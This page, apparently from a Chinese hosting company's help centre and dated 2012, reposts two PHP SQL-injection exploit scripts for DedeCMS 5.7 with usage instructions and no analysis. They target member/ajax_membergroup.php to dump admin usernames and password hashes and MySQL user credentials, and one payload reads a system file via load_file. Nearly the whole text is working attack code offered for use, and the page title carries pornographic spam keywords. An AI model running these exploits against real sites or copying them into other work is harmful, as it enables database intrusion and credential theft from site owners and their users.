亚洲综合社区欧美综合色-欧美逼逼一区二区三区-国产老熟女高潮精品网站-国产日韩最新视频在线看

始創(chuàng)于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊(cè)有禮 登錄
  • 掛牌上市企業(yè)
  • 60秒人工響應(yīng)
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補(bǔ)償
全部產(chǎn)品
您的位置: 網(wǎng)站首頁(yè) > 幫助中心>文章內(nèi)容

最新兩個(gè)DEDECMS5.7漏洞EXP
發(fā)布時(shí)間:  2012/7/9 18:16:25
 5.7.php:

<?php
ini_set("max_execution_time",0);
error_reporting(7);
ob_implicit_flush(true);
function usage()
{
global $argv;
exit(
" --+++============================================================+++--".
" --+++=================== DeDe 5.7 sql Exploit ==================+++--".
" --+++============================================================+++--".
" [+] Author : CunZhang".
" [+] Time : 2012-4-10".
" [+] Blog : http://www.sysmjj.com".
" [+] Usage : php ".$argv[0]." <hostname> <path>".
" [+] Exp : php ".$argv[0]." localhost /".

" ");
}

function query($biao,$chr,$chs)
{
global $pre;
switch ($chs){
case 1:
$query = "@`'` Union select concat(0x7e,0x27,count(*),0x27,0x7e) from `".$pre."admin` where 1 or id=@`'`";
break;
case 2:
$query = "@`'` Union select concat(0x7e,0x27,userid,0x7C,pwd,0x27,0x7e) from `".$pre."admin` limit $chr,1 Union select concat(0x7e,0x27,userid,0x7C,pwd,0x27,0x7e) from `".$pre."admin` where 1=2 or id=@`'`";
break;
case 3:
$query = "'";
break;
case 4:
$query = "@`'` Union select concat(0x7e,0x27,count(*),0x27,0x7e) from `mysql`.user where 1 or user=@`'`";
break;
case 5:
$query = "@`'` Union select concat(0x7e,0x27,Host,0x7C,User,0x7C,Password,0x7C,Select_priv,0x27,0x7e) from `mysql`.user limit $chr,1 Union select 1 from `".$pre."admin` where 1=2 or id=@`'`";
break;
case 6:
$query = "@`'` Union select concat(0x7e,0x27,Load_file(0x633A5C626F6F742E696E69),0x27,0x7e) from `mysql`.user where 1 or user=@`'`";
break;
}
//echo $query." ";
$query = urlencode($query);
return $query;
}

function exploit($hostname, $path,$biao, $chr, $chs)
{
$conn = fsockopen($hostname, 80);
if (!$conn){
exit(" [-] No response from $conn ");
}

$postdata = "action=post&membergroup=".query($biao,$chr,$chs);
$message = "POST ".$path."member/ajax_membergroup.php HTTP/1.1 ";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* ";
$message .= "Accept-Language: zh-cn ";
$message .= "Content-Type: application/x-www-form-urlencoded ";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ";
$message .= "Host: $hostname ";
$message .= "Content-Length: ".strlen($postdata)." ";
$message .= "Cookie: $sessions ";
$message .= "Connection: Close ";
$message .= $postdata;
//echo $message ;
$inheader = 1;
fputs($conn, $message);
while (!feof($conn))
$reply .= fread($conn, 1024);
fclose($conn);
//print $reply;


$reply=substr($reply,strpos($reply," "));
//echo $reply;
//echo iconv('UTF-8', 'GB2312', $reply);
return $reply;
}


function GetPre($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,3);
//echo $response;
if (preg_match("/FROM (.*?)member_group/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "dede_";
}
}

function dbcounts($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,4);
//echo $response;
if (preg_match("/~'(.*?)'~/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function counts($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,1);
//echo $response;
if (preg_match("/~'(.*?)'~/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function GetDBUser($hostname,$path,$c)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,$c-1,5);
if (preg_match("/~'(.*?)'~/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function GetUser($hostname,$path,$c)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,$c-1,2);
if (preg_match("/~'(.*?)'~/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

///////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////

if ($argc != 3)
usage();
$hostname = $argv[1];
$path = $argv[2];
echo "[+] ======================================================= ";
echo "[+] Pre: ";
ob_flush();
flush();
$pre=GetPre($hostname, $path);
echo $pre." ";
echo "[+] DbCount: ";
ob_flush();
flush();
$dbcount=dbcounts($hostname, $path);
echo $dbcount." ";
///////////////////////////////////////////////////////////////////
$c=1;
///////////////////////////////////////////////////////////////////
while($c<=$dbcount){
echo "[+] <".($c)."> ";
ob_flush();
flush();
$dbuser=GetDBUser($hostname,$path,$c);
echo $dbuser." ";
$c++;
}
///////////////////////////////////////////////////////////////////
echo "[+] Admin@Count: ";
ob_flush();
flush();
$count=counts($hostname, $path);
echo $count." ";
ob_flush();
flush();
///////////////////////////////////////////////////////////////////
$c=1;
///////////////////////////////////////////////////////////////////
while($c<=$count){
echo "[+] <".($c)."> ";
ob_flush();
flush();
$user=GetUser($hostname,$path,$c);
echo $user." ";
$c++;
}
///////////////////////////////////////////////////////////////////
?>

 

 

 

5.71.php:

<?php
ini_set("max_execution_time",0);
error_reporting(7);
ob_implicit_flush(true);
function usage()
{
global $argv;
exit(
" --+++============================================================+++--".
" --+++=================== DeDe 5.7 sql Exploit ==================+++--".
" --+++============================================================+++--".
" [+] Author : CunZhang".
" [+] Time : 2012-4-10".
" [+] Blog : http://www.sysmjj.com".
" [+] Usage : php ".$argv[0]." <hostname> <path>".
" [+] Exp : php ".$argv[0]." localhost /".

" ");
}

function query($biao,$chr,$chs)
{
global $pre;
switch ($chs){
case 1:
$query = "`a'` and(SELECT/*''*/1 FROM(select/*''*/count(*),concat(floor(rand(0)*2),(SELECT/*''*/concat(0x5b,count(*),0x5d) from ".$pre."admin))a from information_schema.tables group by a)b)";
break;
case 2:
$query = "`a'` and(SELECT/*''*/1 FROM(select/*''*/count(*),concat(floor(rand(0)*2),(SELECT/*''*/concat(0x5b,userid,0x3a,pwd,0x5d) from ".$pre."admin Limit ".$chr.",1))a from information_schema.tables group by a)b)";
break;
case 3:
$query = "'";
break;
case 4:
$query = "`a'` and(SELECT/*''*/1 FROM(select/*''*/count(*),concat(floor(rand(0)*2),(SELECT/*''*/concat(0x5b,count(*),0x5d) from mysql.user))a from information_schema.tables group by a)b)";
break;
case 5:
$query = "`a'` and(SELECT/*''*/1 FROM(select/*''*/count(*),concat(floor(rand(0)*2),(SELECT/*''*/concat(0x5b,Host,0x7C,User,0x7C,Password,0x7C,File_priv,0x5d) from mysql.user Limit ".$chr.",1))a from information_schema.tables group by a)b)";
break;
}
//echo $query." ";
$query = urlencode($query);
return $query;
}

function exploit($hostname, $path,$biao, $chr, $chs)
{
$conn = fsockopen($hostname, 80);
if (!$conn){
exit(" [-] No response from $conn ");
}

$postdata = "action=post&membergroup=".query($biao,$chr,$chs);
$message = "POST ".$path."member/ajax_membergroup.php HTTP/1.1 ";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* ";
$message .= "Accept-Language: zh-cn ";
$message .= "Content-Type: application/x-www-form-urlencoded ";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ";
$message .= "Host: $hostname ";
$message .= "Content-Length: ".strlen($postdata)." ";
$message .= "Cookie: $sessions ";
$message .= "Connection: Close ";
$message .= $postdata;
//echo $message ;
$inheader = 1;
fputs($conn, $message);
while (!feof($conn))
$reply .= fread($conn, 1024);
fclose($conn);
//print $reply;


$reply=substr($reply,strpos($reply," "));
//echo $reply;
//echo iconv('UTF-8', 'GB2312', $reply);
return $reply;
}


function GetPre($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,3);
//echo $response;
if (preg_match("/FROM (.*?)member_group/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "dede_";
}
}

function dbcounts($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,4);
//echo $response;
if (preg_match("/[(.*?)]/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function counts($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,1);
//echo $response;
if (preg_match("/[(.*?)]/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function GetDBUser($hostname,$path,$c)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,$c-1,5);
if (preg_match("/'d(.*?)'/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function GetUser($hostname,$path,$c)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,$c-1,2);
if (preg_match("/'d(.*?)'/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

///////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////

if ($argc != 3)
usage();
$hostname = $argv[1];
$path = $argv[2];
echo "[+] ======================================================= ";
echo "[+] Pre: ";
ob_flush();
flush();
$pre=GetPre($hostname, $path);
echo $pre." ";
echo "[+] DbCount: ";
ob_flush();
flush();
$dbcount=dbcounts($hostname, $path);
echo $dbcount." ";
///////////////////////////////////////////////////////////////////
$c=1;
///////////////////////////////////////////////////////////////////
while($c<=$dbcount){
echo "[+] <".($c)."> ";
ob_flush();
flush();
$dbuser=GetDBUser($hostname,$path,$c);
echo $dbuser." ";
$c++;
}
///////////////////////////////////////////////////////////////////
echo "[+] Admin@Count: ";
ob_flush();
flush();
$count=counts($hostname, $path);
echo $count." ";
ob_flush();
flush();
///////////////////////////////////////////////////////////////////
$c=1;
///////////////////////////////////////////////////////////////////
while($c<=$count){
echo "[+] <".($c)."> ";
ob_flush();
flush();
$user=GetUser($hostname,$path,$c);
echo $user." ";
$c++;
}
///////////////////////////////////////////////////////////////////
?>


本文出自:億恩科技【1tcdy.com】

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]
  • 您可能在找
  • 億恩北京公司:
  • 經(jīng)營(yíng)性ICP/ISP證:京B2-20150015
    •
  • 億恩鄭州公司:
  • 經(jīng)營(yíng)性ICP/ISP/IDC證:豫B1.B2-20060070
    •
  • 億恩南昌公司:
  • 經(jīng)營(yíng)性ICP/ISP證:贛B2-20080012
    •
  • 服務(wù)器/云主機(jī) 24小時(shí)售后服務(wù)電話:0371-60135900
  • 虛擬主機(jī)/智能建站 24小時(shí)售后服務(wù)電話:0371-60135900
    •
    專注服務(wù)器托管17年
    掃掃關(guān)注-微信公眾號(hào)
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權(quán)所有  地址:鄭州市高新區(qū)翠竹街1號(hào)總部企業(yè)基地億恩大廈  法律顧問:河南亞太人律師事務(wù)所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號(hào)
      1
     
     
     
     

    0371-60135900
    7*24小時(shí)客服服務(wù)熱線